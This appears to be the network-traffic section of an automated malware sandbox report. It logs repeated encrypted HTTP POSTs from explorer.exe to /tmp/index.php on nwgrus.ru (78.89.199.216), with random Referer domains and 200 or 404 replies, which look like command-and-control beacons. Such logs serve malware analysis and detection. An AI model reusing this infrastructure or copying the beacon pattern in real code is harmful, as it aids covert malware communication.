                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.44974578.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:33.269844055 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://awdlidomwbvuuhth.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 196
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:33.269926071 CEST196OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 47 af ae
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuwGV_`g2EywiErB] 0e(6$&zO{&#=4NJ8J
                                                                                      Oct 1, 2024 15:17:34.418441057 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:34 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.44974678.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:34.427390099 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://nrwpjmrfkgs.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 205
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:34.427407026 CEST205OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2f 2c da e8
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu/,4mFuc8,A/i@SHGV!Ti)\1LC.t(/khR\2
                                                                                      Oct 1, 2024 15:17:35.545464039 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:35 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.44974778.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:35.553958893 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://ikextycmggavxa.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 205
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:35.553971052 CEST205OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 30 49 e6 a1
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu0Ip_`zo2P#PofzVI77OduN}?B4o0{P_D.-gv1Y
                                                                                      Oct 1, 2024 15:17:36.688323021 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:36 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.44974878.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:36.697046995 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://xflbmtqhirja.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 168
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:36.697081089 CEST168OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 37 51 b3 87
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu7Q/{ye{f#<5+ODKyZ#UdY4Y-6BlF
                                                                                      Oct 1, 2024 15:17:37.858297110 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:37 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.44974978.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:37.871206045 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://pyqfoqocstl.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 149
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:37.871223927 CEST149OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5c 0e e7 aa
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu\t!@y8j-8c*5U@5}VyMFWXD</
                                                                                      Oct 1, 2024 15:17:38.979603052 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:38 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.44975078.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:38.987994909 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dijxohecsahmqya.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 319
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:38.988075972 CEST319OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 55 5e ce 9d
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuU^i]tPDW(hW>`e]zf?\K^-eu%Z(pi^=a `GJ$<I{R1YoDx{eH:<9q
                                                                                      Oct 1, 2024 15:17:40.096661091 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:39 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.44975178.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:40.104718924 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://fkwktqlntyvhlhv.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 271
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:40.104804993 CEST271OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 45 21 ab 9d
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuE!n\#S7Dr<U37H,[`BJ4E~^Q$!F2;gB>(I8\3Yd1eB,]lI8C=Nq
                                                                                      Oct 1, 2024 15:17:41.358256102 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:41 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.44975278.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:41.422532082 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://axuolhuhwntg.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 261
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:41.422544956 CEST261OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2a 1b ba 82
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu*xTh`|LJWF,CDW7/${Zk<6_"c9@D6.BIXDN8i9Hd*<>-
                                                                                      Oct 1, 2024 15:17:42.684295893 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:42 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.44975378.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:42.692390919 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://obobrllwrvxobu.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 323
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:42.692410946 CEST323OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 7b 20 d3 8f
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu{ XnGsl'}2%$3><[&H=[FW<T&+6E=x/ VL=U@l OoW*U!4
                                                                                      Oct 1, 2024 15:17:43.812161922 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:43 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.44975478.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:43.896550894 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://flkhebcbosbhs.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 127
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:43.896550894 CEST127OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 4f 57 df e7
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuOWyIO6uw O+6
                                                                                      Oct 1, 2024 15:17:45.121233940 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:44 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
